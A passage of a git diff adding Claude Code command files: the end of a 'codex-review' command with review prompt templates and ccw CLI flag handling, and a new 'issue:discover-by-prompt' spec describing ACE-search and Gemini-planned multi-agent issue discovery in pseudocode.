||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Security best practices, OWASP Top 10
|
||||
EXPECTED: Security report with: vulnerability classification, CVE references where applicable, remediation code snippets, risk severity matrix
|
||||
CONSTRAINTS: Security-first analysis | Flag all potential vulnerabilities
|
||||
```
|
||||
|
||||
**Performance Focus Prompt:**
|
||||
```
|
||||
PURPOSE: Performance-focused code review to identify bottlenecks and optimization opportunities; success = measurable improvement recommendations
|
||||
TASK: • Analyze algorithmic complexity (Big-O) • Identify memory allocation issues • Check for N+1 queries and blocking operations • Evaluate caching opportunities
|
||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Performance patterns and anti-patterns
|
||||
EXPECTED: Performance report with: complexity analysis, bottleneck identification, optimization suggestions with expected impact, benchmark recommendations
|
||||
CONSTRAINTS: Performance optimization focus
|
||||
```
|
||||
|
||||
**Code Quality Focus Prompt:**
|
||||
```
|
||||
PURPOSE: Code quality review to improve maintainability and readability; success = cleaner, more maintainable code
|
||||
TASK: • Assess SOLID principles adherence • Identify code duplication and abstraction opportunities • Review naming conventions and clarity • Evaluate test coverage implications
|
||||
MODE: review
|
||||
CONTEXT: {target_description} | Memory: Project coding standards
|
||||
EXPECTED: Quality report with: principle violations, refactoring suggestions, naming improvements, maintainability score
|
||||
CONSTRAINTS: Code quality and maintainability focus
|
||||
```
|
||||
|
||||
**3.2 Build Target Description**
|
||||
|
||||
Based on selection, set `{target_description}`:
|
||||
- Uncommitted: `Reviewing uncommitted changes (staged + unstaged + untracked)`
|
||||
- Base branch: `Reviewing changes against {branch} branch`
|
||||
- Commit: `Reviewing changes introduced by commit {sha}`
|
||||
|
||||
### Step 4: Execute via CCW CLI
|
||||
|
||||
Build and execute the ccw cli command:
|
||||
|
||||
```bash
|
||||
# Base structure
|
||||
ccw cli -p "<PROMPT>" --tool codex --mode review [OPTIONS]
|
||||
```
|
||||
|
||||
**Command Construction:**
|
||||
|
||||
```bash
|
||||
# Variables from user selection
|
||||
TARGET_FLAG="" # --uncommitted | --base <branch> | --commit <sha>
|
||||
MODEL_FLAG="" # --model <model> (if not default)
|
||||
TITLE_FLAG="" # --title "<title>" (if provided)
|
||||
|
||||
# Build target flag
|
||||
if [ "$target" = "uncommitted" ]; then
|
||||
TARGET_FLAG="--uncommitted"
|
||||
elif [ "$target" = "base" ]; then
|
||||
TARGET_FLAG="--base $branch"
|
||||
elif [ "$target" = "commit" ]; then
|
||||
TARGET_FLAG="--commit $sha"
|
||||
fi
|
||||
|
||||
# Build model flag (only if not default)
|
||||
if [ "$model" != "default" ] && [ -n "$model" ]; then
|
||||
MODEL_FLAG="--model $model"
|
||||
fi
|
||||
|
||||
# Build title flag (if provided)
|
||||
if [ -n "$title" ]; then
|
||||
TITLE_FLAG="--title \"$title\""
|
||||
fi
|
||||
|
||||
# Execute
|
||||
ccw cli -p "$PROMPT" --tool codex --mode review $TARGET_FLAG $MODEL_FLAG $TITLE_FLAG
|
||||
```
|
||||
|
||||
**Full Example Commands:**
|
||||
|
||||
**Option 1: With custom prompt (reviews uncommitted by default):**
|
||||
```bash
|
||||
ccw cli -p "
|
||||
PURPOSE: Comprehensive code review to identify issues and improve quality; success = actionable feedback with priorities
|
||||
TASK: • Review correctness and logic • Check standards compliance • Identify bugs and edge cases • Evaluate documentation
|
||||
MODE: review
|
||||
CONTEXT: Reviewing uncommitted changes | Memory: Project conventions
|
||||
EXPECTED: Structured report with severity levels, file:line refs, improvement suggestions
|
||||
CONSTRAINTS: Actionable feedback
|
||||
" --tool codex --mode review --rule analysis-review-code-quality
|
||||
```
|
||||
|
||||
**Option 2: Target flag only (no prompt allowed):**
|
||||
```bash
|
||||
ccw cli --tool codex --mode review --uncommitted
|
||||
```
|
||||
|
||||
### Step 5: Execute and Display Results
|
||||
|
||||
```bash
|
||||
Bash({
|
||||
command: "ccw cli -p \"$PROMPT\" --tool codex --mode review $FLAGS",
|
||||
run_in_background: true
|
||||
})
|
||||
```
|
||||
|
||||
Wait for completion and display formatted results.
|
||||
|
||||
## Quick Usage Examples
|
||||
|
||||
### Direct Execution (No Interaction)
|
||||
|
||||
```bash
|
||||
# Review uncommitted changes with default settings
|
||||
/cli:codex-review --uncommitted
|
||||
|
||||
# Review against main branch
|
||||
/cli:codex-review --base main
|
||||
|
||||
# Review specific commit
|
||||
/cli:codex-review --commit abc123
|
||||
|
||||
# Review with custom model
|
||||
/cli:codex-review --uncommitted --model o3
|
||||
|
||||
# Review with security focus
|
||||
/cli:codex-review --uncommitted security
|
||||
|
||||
# Full options
|
||||
/cli:codex-review --base main --model o3 --title "Auth Feature" security
|
||||
```
|
||||
|
||||
### Interactive Mode
|
||||
|
||||
```bash
|
||||
# Start interactive selection (guided flow)
|
||||
/cli:codex-review
|
||||
```
|
||||
|
||||
## Focus Area Mapping
|
||||
|
||||
| User Selection | Prompt Focus | Key Checks |
|
||||
|----------------|--------------|------------|
|
||||
| General review | Comprehensive | Correctness, style, bugs, docs |
|
||||
| Security focus | Security-first | Injection, auth, validation, exposure |
|
||||
| Performance focus | Optimization | Complexity, memory, queries, caching |
|
||||
| Code quality | Maintainability | SOLID, duplication, naming, tests |
|
||||
|
||||
## Error Handling
|
||||
|
||||
### No Changes to Review
|
||||
```
|
||||
No changes found for review target. Suggestions:
|
||||
- For --uncommitted: Make some code changes first
|
||||
- For --base: Ensure branch exists and has diverged
|
||||
- For --commit: Verify commit SHA exists
|
||||
```
|
||||
|
||||
### Invalid Branch
|
||||
```bash
|
||||
# Show available branches
|
||||
git branch -a --list | head -20
|
||||
```
|
||||
|
||||
### Invalid Commit
|
||||
```bash
|
||||
# Show recent commits
|
||||
git log --oneline -10
|
||||
```
|
||||
|
||||
## Integration Notes
|
||||
|
||||
- Uses `ccw cli --tool codex --mode review` endpoint
|
||||
- Model passed via prompt (codex uses `-c model=` internally)
|
||||
- Target flags (`--uncommitted`, `--base`, `--commit`) passed through to codex
|
||||
- Prompt follows standard ccw cli template format for consistency
|
||||
|
||||
## Validation Constraints
|
||||
|
||||
**IMPORTANT: Target flags and prompt are mutually exclusive**
|
||||
|
||||
The codex CLI has a constraint where target flags (`--uncommitted`, `--base`, `--commit`) cannot be used with a positional `[PROMPT]` argument:
|
||||
|
||||
```
|
||||
error: the argument '--uncommitted' cannot be used with '[PROMPT]'
|
||||
error: the argument '--base <BRANCH>' cannot be used with '[PROMPT]'
|
||||
error: the argument '--commit <SHA>' cannot be used with '[PROMPT]'
|
||||
```
|
||||
|
||||
**Behavior:**
|
||||
- When ANY target flag is specified, ccw cli automatically skips template concatenation (systemRules/roles)
|
||||
- The review uses codex's default review behavior for the specified target
|
||||
- Custom prompts are only supported WITHOUT target flags (reviews uncommitted changes by default)
|
||||
|
||||
**Valid combinations:**
|
||||
| Command | Result |
|
||||
|---------|--------|
|
||||
| `codex review "Focus on security"` | ✓ Custom prompt, reviews uncommitted (default) |
|
||||
| `codex review --uncommitted` | ✓ No prompt, uses default review |
|
||||
| `codex review --base main` | ✓ No prompt, uses default review |
|
||||
| `codex review --commit abc123` | ✓ No prompt, uses default review |
|
||||
| `codex review --uncommitted "prompt"` | ✗ Invalid - mutually exclusive |
|
||||
| `codex review --base main "prompt"` | ✗ Invalid - mutually exclusive |
|
||||
| `codex review --commit abc123 "prompt"` | ✗ Invalid - mutually exclusive |
|
||||
|
||||
**Examples:**
|
||||
```bash
|
||||
# ✓ Valid: prompt only (reviews uncommitted by default)
|
||||
ccw cli -p "Focus on security" --tool codex --mode review
|
||||
|
||||
# ✓ Valid: target flag only (no prompt)
|
||||
ccw cli --tool codex --mode review --uncommitted
|
||||
ccw cli --tool codex --mode review --base main
|
||||
ccw cli --tool codex --mode review --commit abc123
|
||||
|
||||
# ✗ Invalid: target flag with prompt (will fail)
|
||||
ccw cli -p "Review this" --tool codex --mode review --uncommitted
|
||||
ccw cli -p "Review this" --tool codex --mode review --base main
|
||||
ccw cli -p "Review this" --tool codex --mode review --commit abc123
|
||||
```
|
||||
764
.claude/commands/issue/discover-by-prompt.md
Normal file
764
.claude/commands/issue/discover-by-prompt.md
Normal file
@@ -0,0 +1,764 @@
|
||||
---
|
||||
name: issue:discover-by-prompt
|
||||
description: Discover issues from user prompt with Gemini-planned iterative multi-agent exploration. Uses ACE semantic search for context gathering and supports cross-module comparison (e.g., frontend vs backend API contracts).
|
||||
argument-hint: "<prompt> [--scope=src/**] [--depth=standard|deep] [--max-iterations=5]"
|
||||
allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*), Task(*), AskUserQuestion(*), Glob(*), Grep(*), mcp__ace-tool__search_context(*), mcp__exa__search(*)
|
||||
---
|
||||
|
||||
# Issue Discovery by Prompt
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Discover issues based on user description
|
||||
/issue:discover-by-prompt "Check if frontend API calls match backend implementations"
|
||||
|
||||
# Compare specific modules
|
||||
/issue:discover-by-prompt "Verify auth flow consistency between mobile and web clients" --scope=src/auth/**,src/mobile/**
|
||||
|
||||
# Deep exploration with more iterations
|
||||
/issue:discover-by-prompt "Find all places where error handling is inconsistent" --depth=deep --max-iterations=8
|
||||
|
||||
# Focused backend-frontend contract check
|
||||
/issue:discover-by-prompt "Compare REST API definitions with frontend fetch calls"
|
||||
```
|
||||
|
||||
**Core Difference from `/issue:discover`**:
|
||||
- `discover`: Pre-defined perspectives (bug, security, etc.), parallel execution
|
||||
- `discover-by-prompt`: User-driven prompt, Gemini-planned strategy, iterative exploration
|
||||
|
||||
## What & Why
|
||||
|
||||
### Core Concept
|
||||
|
||||
Prompt-driven issue discovery with intelligent planning. Instead of fixed perspectives, this command:
|
||||
|
||||
1. **Analyzes user intent** via Gemini to understand what to find
|
||||
2. **Plans exploration strategy** dynamically based on codebase structure
|
||||
3. **Executes iterative multi-agent exploration** with feedback loops
|
||||
4. **Performs cross-module comparison** when detecting comparison intent
|
||||
|
||||
### Value Proposition
|
||||
|
||||
1. **Natural Language Input**: Describe what you want to find, not how to find it
|
||||
2. **Intelligent Planning**: Gemini designs optimal exploration strategy
|
||||
3. **Iterative Refinement**: Each round builds on previous discoveries
|
||||
4. **Cross-Module Analysis**: Compare frontend/backend, mobile/web, old/new implementations
|
||||
5. **Adaptive Exploration**: Adjusts direction based on findings
|
||||
|
||||
### Use Cases
|
||||
|
||||
| Scenario | Example Prompt |
|
||||
|----------|----------------|
|
||||
| API Contract | "Check if frontend calls match backend endpoints" |
|
||||
| Error Handling | "Find inconsistent error handling patterns" |
|
||||
| Migration Gap | "Compare old auth with new auth implementation" |
|
||||
| Feature Parity | "Verify mobile has all web features" |
|
||||
| Schema Drift | "Check if TypeScript types match API responses" |
|
||||
| Integration | "Find mismatches between service A and service B" |
|
||||
|
||||
## How It Works
|
||||
|
||||
### Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Prompt Analysis & Initialization
|
||||
├─ Parse user prompt and flags
|
||||
├─ Detect exploration intent (comparison/search/verification)
|
||||
└─ Initialize discovery session
|
||||
|
||||
Phase 1.5: ACE Context Gathering
|
||||
├─ Use ACE semantic search to understand codebase structure
|
||||
├─ Identify relevant modules based on prompt keywords
|
||||
├─ Collect architecture context for Gemini planning
|
||||
└─ Build initial context package
|
||||
|
||||
Phase 2: Gemini Strategy Planning
|
||||
├─ Feed ACE context + prompt to Gemini CLI
|
||||
├─ Gemini analyzes and generates exploration strategy
|
||||
├─ Create exploration dimensions with search targets
|
||||
├─ Define comparison matrix (if comparison intent)
|
||||
└─ Set success criteria and iteration limits
|
||||
|
||||
Phase 3: Iterative Agent Exploration (with ACE)
|
||||
├─ Iteration 1: Initial exploration by assigned agents
|
||||
│ ├─ Agent A: ACE search + explore dimension 1
|
||||
│ ├─ Agent B: ACE search + explore dimension 2
|
||||
│ └─ Collect findings, update shared context
|
||||
├─ Iteration 2-N: Refined exploration
|
||||
│ ├─ Analyze previous findings
|
||||
│ ├─ ACE search for related code paths
|
||||
│ ├─ Execute targeted exploration
|
||||
│ └─ Update cumulative findings
|
||||
└─ Termination: Max iterations or convergence
|
||||
|
||||
Phase 4: Cross-Analysis & Synthesis
|
||||
├─ Compare findings across dimensions
|
||||
├─ Identify discrepancies and issues
|
||||
├─ Calculate confidence scores
|
||||
└─ Generate issue candidates
|
||||
|
||||
Phase 5: Issue Generation & Summary
|
||||
├─ Convert findings to issue format
|
||||
├─ Write discovery outputs
|
||||
└─ Prompt user for next action
|
||||
```
|
||||
|
||||
### Exploration Dimensions
|
||||
|
||||
Dimensions are **dynamically generated by Gemini** based on the user prompt. Not limited to predefined categories.
|
||||
|
||||
**Examples**:
|
||||
|
||||
| Prompt | Generated Dimensions |
|
||||
|--------|---------------------|
|
||||
| "Check API contracts" | frontend-calls, backend-handlers |
|
||||
| "Find auth issues" | auth-module (single dimension) |
|
||||
| "Compare old/new implementations" | legacy-code, new-code |
|
||||
| "Audit payment flow" | payment-service, validation, logging |
|
||||
| "Find error handling gaps" | error-handlers, error-types, recovery-logic |
|
||||
|
||||
Gemini analyzes the prompt + ACE context to determine:
|
||||
- How many dimensions are needed (1 to N)
|
||||
- What each dimension should focus on
|
||||
- Whether comparison is needed between dimensions
|
||||
|
||||
### Iteration Strategy
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ Iteration Loop │
|
||||
├─────────────────────────────────────────────────────────────┤
|
||||
│ 1. Plan: What to explore this iteration │
|
||||
│ └─ Based on: previous findings + unexplored areas │
|
||||
│ │
|
||||
│ 2. Execute: Launch agents for this iteration │
|
||||
│ └─ Each agent: explore → collect → return summary │
|
||||
│ │
|
||||
│ 3. Analyze: Process iteration results │
|
||||
│ └─ New findings? Gaps? Contradictions? │
|
||||
│ │
|
||||
│ 4. Decide: Continue or terminate │
|
||||
│ └─ Terminate if: max iterations OR convergence OR │
|
||||
│ high confidence on all questions │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
### Phase 1: Prompt Analysis & Initialization
|
||||
|
||||
```javascript
|
||||
// Step 1: Parse arguments
|
||||
const { prompt, scope, depth, maxIterations } = parseArgs(args);
|
||||
|
||||
// Step 2: Generate discovery ID
|
||||
const discoveryId = `DBP-${formatDate(new Date(), 'YYYYMMDD-HHmmss')}`;
|
||||
|
||||
// Step 3: Create output directory
|
||||
const outputDir = `.workflow/issues/discoveries/${discoveryId}`;
|
||||
await mkdir(outputDir, { recursive: true });
|
||||
await mkdir(`${outputDir}/iterations`, { recursive: true });
|
||||
|
||||
// Step 4: Detect intent type from prompt
|
||||
const intentType = detectIntent(prompt);
|
||||
// Returns: 'comparison' | 'search' | 'verification' | 'audit'
|
||||
|
||||
// Step 5: Initialize discovery state
|
||||
await writeJson(`${outputDir}/discovery-state.json`, {
|
||||
discovery_id: discoveryId,
|
||||
type: 'prompt-driven',
|
||||
prompt: prompt,
|
||||
intent_type: intentType,
|
||||
scope: scope || '**/*',
|
||||
depth: depth || 'standard',
|
||||
max_iterations: maxIterations || 5,
|
||||
phase: 'initialization',
|
||||
created_at: new Date().toISOString(),
|
||||
iterations: [],
|
||||
cumulative_findings: [],
|
||||
comparison_matrix: null // filled for comparison intent
|
||||
});
|
||||
```
|
||||
|
||||
### Phase 1.5: ACE Context Gathering
|
||||
|
||||
**Purpose**: Use ACE semantic search to gather codebase context before Gemini planning.
|
||||
|
||||
```javascript
|
||||
// Step 1: Extract keywords from prompt for semantic search
|
||||
const keywords = extractKeywords(prompt);
|
||||
// e.g., "frontend API calls match backend" → ["frontend", "API", "backend", "endpoints"]
|
||||
|
||||
// Step 2: Use ACE to understand codebase structure
|
||||
const aceQueries = [
|
||||
`Project architecture and module structure for ${keywords.join(', ')}`,
|
||||
`Where are ${keywords[0]} implementations located?`,
|
||||
`How does ${keywords.slice(0, 2).join(' ')} work in this codebase?`
|
||||
];
|
||||
|
||||
const aceResults = [];
|
||||
for (const query of aceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: query
|
||||
});
|
||||
aceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Step 3: Build context package for Gemini (kept in memory)
|
||||
const aceContext = {
|
||||
prompt_keywords: keywords,
|
||||
codebase_structure: aceResults[0].result,
|
||||
relevant_modules: aceResults.slice(1).map(r => r.result),
|
||||
detected_patterns: extractPatterns(aceResults)
|
||||
};
|
||||
|
||||
// Step 4: Update state (no separate file)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'context-gathered',
|
||||
ace_context: {
|
||||
queries_executed: aceQueries.length,
|
||||
modules_identified: aceContext.relevant_modules.length
|
||||
}
|
||||
});
|
||||
|
||||
// aceContext passed to Phase 2 in memory
|
||||
```
|
||||
|
||||
**ACE Query Strategy by Intent Type**:
|
||||
|
||||
| Intent | ACE Queries |
|
||||
|--------|-------------|
|
||||
| **comparison** | "frontend API calls", "backend API handlers", "API contract definitions" |
|
||||
| **search** | "{keyword} implementations", "{keyword} usage patterns" |
|
||||
| **verification** | "expected behavior for {feature}", "test coverage for {feature}" |
|
||||
| **audit** | "all {category} patterns", "{category} security concerns" |
|
||||
|
||||
### Phase 2: Gemini Strategy Planning
|
||||
|
||||
**Purpose**: Gemini analyzes user prompt + ACE context to design optimal exploration strategy.
|
||||
|
||||
```javascript
|
||||
// Step 1: Load ACE context gathered in Phase 1.5
|
||||
const aceContext = await readJson(`${outputDir}/ace-context.json`);
|
||||
|
||||
// Step 2: Build Gemini planning prompt with ACE context
|
||||
const planningPrompt = `
|
||||
PURPOSE: Analyze discovery prompt and create exploration strategy based on codebase context
|
||||
TASK:
|
||||
• Parse user intent from prompt: "${prompt}"
|
||||
• Use codebase context to identify specific modules and files to explore
|
||||
• Create exploration dimensions with precise search targets
|
||||
• Define comparison matrix structure (if comparison intent)
|
||||
• Set success criteria and iteration strategy
|
||||
MODE: analysis
|
||||
CONTEXT: @${scope || '**/*'} | Discovery type: ${intentType}
|
||||
|
||||
## Codebase Context (from ACE semantic search)
|
||||
${JSON.stringify(aceContext, null, 2)}
|
||||
|
||||
EXPECTED: JSON exploration plan following exploration-plan-schema.json:
|
||||
{
|
||||
"intent_analysis": { "type": "${intentType}", "primary_question": "...", "sub_questions": [...] },
|
||||
"dimensions": [{ "name": "...", "description": "...", "search_targets": [...], "focus_areas": [...], "agent_prompt": "..." }],
|
||||
"comparison_matrix": { "dimension_a": "...", "dimension_b": "...", "comparison_points": [...] },
|
||||
"success_criteria": [...],
|
||||
"estimated_iterations": N,
|
||||
"termination_conditions": [...]
|
||||
}
|
||||
CONSTRAINTS: Use ACE context to inform targets | Focus on actionable plan
|
||||
`;
|
||||
|
||||
// Step 3: Execute Gemini planning
|
||||
Bash({
|
||||
command: `ccw cli -p "${planningPrompt}" --tool gemini --mode analysis`,
|
||||
run_in_background: true,
|
||||
timeout: 300000
|
||||
});
|
||||
|
||||
// Step 4: Parse Gemini output and validate against schema
|
||||
const explorationPlan = await parseGeminiPlanOutput(geminiResult);
|
||||
validateAgainstSchema(explorationPlan, 'exploration-plan-schema.json');
|
||||
|
||||
// Step 5: Enhance plan with ACE-discovered file paths
|
||||
explorationPlan.dimensions = explorationPlan.dimensions.map(dim => ({
|
||||
...dim,
|
||||
ace_suggested_files: aceContext.relevant_modules
|
||||
.filter(m => m.relevance_to === dim.name)
|
||||
.map(m => m.file_path)
|
||||
}));
|
||||
|
||||
// Step 6: Update state (plan kept in memory, not persisted)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'planned',
|
||||
exploration_plan: {
|
||||
dimensions_count: explorationPlan.dimensions.length,
|
||||
has_comparison_matrix: !!explorationPlan.comparison_matrix,
|
||||
estimated_iterations: explorationPlan.estimated_iterations
|
||||
}
|
||||
});
|
||||
|
||||
// explorationPlan passed to Phase 3 in memory
|
||||
```
|
||||
|
||||
**Gemini Planning Responsibilities**:
|
||||
|
||||
| Responsibility | Input | Output |
|
||||
|----------------|-------|--------|
|
||||
| Intent Analysis | User prompt | type, primary_question, sub_questions |
|
||||
| Dimension Design | ACE context + prompt | dimensions with search_targets |
|
||||
| Comparison Matrix | Intent type + modules | comparison_points (if applicable) |
|
||||
| Iteration Strategy | Depth setting | estimated_iterations, termination_conditions |
|
||||
|
||||
**Gemini Planning Output Schema**:
|
||||
|
||||
```json
|
||||
{
|
||||
"intent_analysis": {
|
||||
"type": "comparison|search|verification|audit",
|
||||
"primary_question": "string",
|
||||
"sub_questions": ["string"]
|
||||
},
|
||||
"dimensions": [
|
||||
{
|
||||
"name": "frontend",
|
||||
"description": "Client-side API calls and error handling",
|
||||
"search_targets": ["src/api/**", "src/hooks/**"],
|
||||
"focus_areas": ["fetch calls", "error boundaries", "response parsing"],
|
||||
"agent_prompt": "Explore frontend API consumption patterns..."
|
||||
},
|
||||
{
|
||||
"name": "backend",
|
||||
"description": "Server-side API implementations",
|
||||
"search_targets": ["src/server/**", "src/routes/**"],
|
||||
"focus_areas": ["endpoint handlers", "response schemas", "error responses"],
|
||||
"agent_prompt": "Explore backend API implementations..."
|
||||
}
|
||||
],
|
||||
"comparison_matrix": {
|
||||
"dimension_a": "frontend",
|
||||
"dimension_b": "backend",
|
||||
"comparison_points": [
|
||||
{"aspect": "endpoints", "frontend_check": "fetch URLs", "backend_check": "route paths"},
|
||||
{"aspect": "methods", "frontend_check": "HTTP methods used", "backend_check": "methods accepted"},
|
||||
{"aspect": "payloads", "frontend_check": "request body structure", "backend_check": "expected schema"},
|
||||
{"aspect": "responses", "frontend_check": "response parsing", "backend_check": "response format"},
|
||||
{"aspect": "errors", "frontend_check": "error handling", "backend_check": "error responses"}
|
||||
]
|
||||
},
|
||||
"success_criteria": [
|
||||
"All API endpoints mapped between frontend and backend",
|
||||
"Discrepancies identified with file:line references",
|
||||
"Each finding includes remediation suggestion"
|
||||
],
|
||||
"estimated_iterations": 3,
|
||||
"termination_conditions": [
|
||||
"All comparison points verified",
|
||||
"No new findings in last iteration",
|
||||
"Confidence > 0.8 on primary question"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: Iterative Agent Exploration (with ACE)
|
||||
|
||||
**Purpose**: Multi-agent iterative exploration using ACE for semantic search within each iteration.
|
||||
|
||||
```javascript
|
||||
let iteration = 0;
|
||||
let cumulativeFindings = [];
|
||||
let sharedContext = { aceDiscoveries: [], crossReferences: [] };
|
||||
let shouldContinue = true;
|
||||
|
||||
while (shouldContinue && iteration < maxIterations) {
|
||||
iteration++;
|
||||
const iterationDir = `${outputDir}/iterations/${iteration}`;
|
||||
await mkdir(iterationDir, { recursive: true });
|
||||
|
||||
// Step 1: ACE-assisted iteration planning
|
||||
// Use previous findings to guide ACE queries for this iteration
|
||||
const iterationAceQueries = iteration === 1
|
||||
? explorationPlan.dimensions.map(d => d.focus_areas[0]) // Initial queries from plan
|
||||
: deriveQueriesFromFindings(cumulativeFindings); // Follow-up queries from findings
|
||||
|
||||
// Execute ACE searches to find related code
|
||||
const iterationAceResults = [];
|
||||
for (const query of iterationAceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: `${query} in ${explorationPlan.scope}`
|
||||
});
|
||||
iterationAceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Update shared context with ACE discoveries
|
||||
sharedContext.aceDiscoveries.push(...iterationAceResults);
|
||||
|
||||
// Step 2: Plan this iteration based on ACE results
|
||||
const iterationPlan = planIteration(iteration, explorationPlan, cumulativeFindings, iterationAceResults);
|
||||
|
||||
// Step 3: Launch dimension agents with ACE context
|
||||
const agentPromises = iterationPlan.dimensions.map(dimension =>
|
||||
Task({
|
||||
subagent_type: "cli-explore-agent",
|
||||
run_in_background: false,
|
||||
description: `Explore ${dimension.name} (iteration ${iteration})`,
|
||||
prompt: buildDimensionPromptWithACE(dimension, iteration, cumulativeFindings, iterationAceResults, iterationDir)
|
||||
})
|
||||
);
|
||||
|
||||
// Wait for iteration agents
|
||||
const iterationResults = await Promise.all(agentPromises);
|
||||
|
||||
// Step 4: Collect and analyze iteration findings
|
||||
const iterationFindings = await collectIterationFindings(iterationDir, iterationPlan.dimensions);
|
||||
|
||||
// Step 5: Cross-reference findings between dimensions
|
||||
if (iterationPlan.dimensions.length > 1) {
|
||||
const crossRefs = findCrossReferences(iterationFindings, iterationPlan.dimensions);
|
||||
sharedContext.crossReferences.push(...crossRefs);
|
||||
}
|
||||
|
||||
cumulativeFindings.push(...iterationFindings);
|
||||
|
||||
// Step 6: Decide whether to continue
|
||||
const convergenceCheck = checkConvergence(iterationFindings, cumulativeFindings, explorationPlan);
|
||||
shouldContinue = !convergenceCheck.converged;
|
||||
|
||||
// Step 7: Update state (iteration summary embedded in state)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
iterations: [...state.iterations, {
|
||||
number: iteration,
|
||||
findings_count: iterationFindings.length,
|
||||
ace_queries: iterationAceQueries.length,
|
||||
cross_references: sharedContext.crossReferences.length,
|
||||
new_discoveries: convergenceCheck.newDiscoveries,
|
||||
confidence: convergenceCheck.confidence,
|
||||
continued: shouldContinue
|
||||
}],
|
||||
cumulative_findings: cumulativeFindings
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
**ACE in Iteration Loop**:
|
||||
|
||||
```
|
||||
Iteration N
|
||||
│
|
||||
├─→ ACE Search (based on previous findings)
|
||||
│ └─ Query: "related code paths for {finding.category}"
|
||||
│ └─ Result: Additional files to explore
|
||||
│
|
||||
├─→ Agent Exploration (with ACE context)
|
||||
│ └─ Agent receives: dimension targets + ACE suggestions
|
||||
│ └─ Agent can call ACE for deeper search
|
||||
│
|
||||
├─→ Cross-Reference Analysis
|
||||
│ └─ Compare findings between dimensions
|
||||
│ └─ Identify discrepancies
|
||||
│
|
||||
└─→ Convergence Check
|
||||
└─ New findings? Continue
|
||||
└─ No new findings? Terminate
|
||||
```
|
||||
|
||||
**Dimension Agent Prompt Template (with ACE)**:
|
||||
|
||||
```javascript
|
||||
function buildDimensionPromptWithACE(dimension, iteration, previousFindings, aceResults, outputDir) {
|
||||
// Filter ACE results relevant to this dimension
|
||||
const relevantAceResults = aceResults.filter(r =>
|
||||
r.query.includes(dimension.name) || dimension.focus_areas.some(fa => r.query.includes(fa))
|
||||
);
|
||||
|
||||
return `
|
||||
## Task Objective
|
||||
Explore ${dimension.name} dimension for issue discovery (Iteration ${iteration})
|
||||
|
||||
## Context
|
||||
- Dimension: ${dimension.name}
|
||||
- Description: ${dimension.description}
|
||||
- Search Targets: ${dimension.search_targets.join(', ')}
|
||||
- Focus Areas: ${dimension.focus_areas.join(', ')}
|
||||
|
||||
## ACE Semantic Search Results (Pre-gathered)
|
||||
The following files/code sections were identified by ACE as relevant to this dimension:
|
||||
${JSON.stringify(relevantAceResults.map(r => ({ query: r.query, files: r.result.slice(0, 5) })), null, 2)}
|
||||
|
||||
**Use ACE for deeper exploration**: You have access to mcp__ace-tool__search_context.
|
||||
When you find something interesting, use ACE to find related code:
|
||||
- mcp__ace-tool__search_context({ project_root_path: ".", query: "related to {finding}" })
|
||||
|
||||
${iteration > 1 ? `
|
||||
## Previous Findings to Build Upon
|
||||
${summarizePreviousFindings(previousFindings, dimension.name)}
|
||||
|
||||
## This Iteration Focus
|
||||
- Explore areas not yet covered (check ACE results for new files)
|
||||
- Verify/deepen previous findings
|
||||
- Follow leads from previous discoveries
|
||||
- Use ACE to find cross-references between dimensions
|
||||
` : ''}
|
||||
|
||||
## MANDATORY FIRST STEPS
|
||||
1. Read exploration plan: ${outputDir}/../exploration-plan.json
|
||||
2. Read schema: ~/.claude/workflows/cli-templates/schemas/discovery-finding-schema.json
|
||||
3. Review ACE results above for starting points
|
||||
4. Explore files identified by ACE
|
||||
|
||||
## Exploration Instructions
|
||||
${dimension.agent_prompt}
|
||||
|
||||
## ACE Usage Guidelines
|
||||
- Use ACE when you need to find:
|
||||
- Where a function/class is used
|
||||
- Related implementations in other modules
|
||||
- Cross-module dependencies
|
||||
- Similar patterns elsewhere in codebase
|
||||
- Query format: Natural language, be specific
|
||||
- Example: "Where is UserService.authenticate called from?"
|
||||
|
||||
## Output Requirements
|
||||
|
||||
**1. Write JSON file**: ${outputDir}/${dimension.name}.json
|
||||
Follow discovery-finding-schema.json:
|
||||
- findings: [{id, title, category, description, file, line, snippet, confidence, related_dimension}]
|
||||
- coverage: {files_explored, areas_covered, areas_remaining}
|
||||
- leads: [{description, suggested_search}] // for next iteration
|
||||
- ace_queries_used: [{query, result_count}] // track ACE usage
|
||||
|
||||
**2. Return summary**:
|
||||
- Total findings this iteration
|
||||
- Key discoveries
|
||||
- ACE queries that revealed important code
|
||||
- Recommended next exploration areas
|
||||
|
||||
## Success Criteria
|
||||
- [ ] JSON written to ${outputDir}/${dimension.name}.json
|
||||
- [ ] Each finding has file:line reference
|
||||
- [ ] ACE used for cross-references where applicable
|
||||
- [ ] Coverage report included
|
||||
- [ ] Leads for next iteration identified
|
||||
`;
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 4: Cross-Analysis & Synthesis
|
||||
|
||||
```javascript
|
||||
// For comparison intent, perform cross-analysis
|
||||
if (intentType === 'comparison' && explorationPlan.comparison_matrix) {
|
||||
const comparisonResults = [];
|
||||
|
||||
for (const point of explorationPlan.comparison_matrix.comparison_points) {
|
||||
const dimensionAFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_a &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
const dimensionBFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_b &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
// Compare and find discrepancies
|
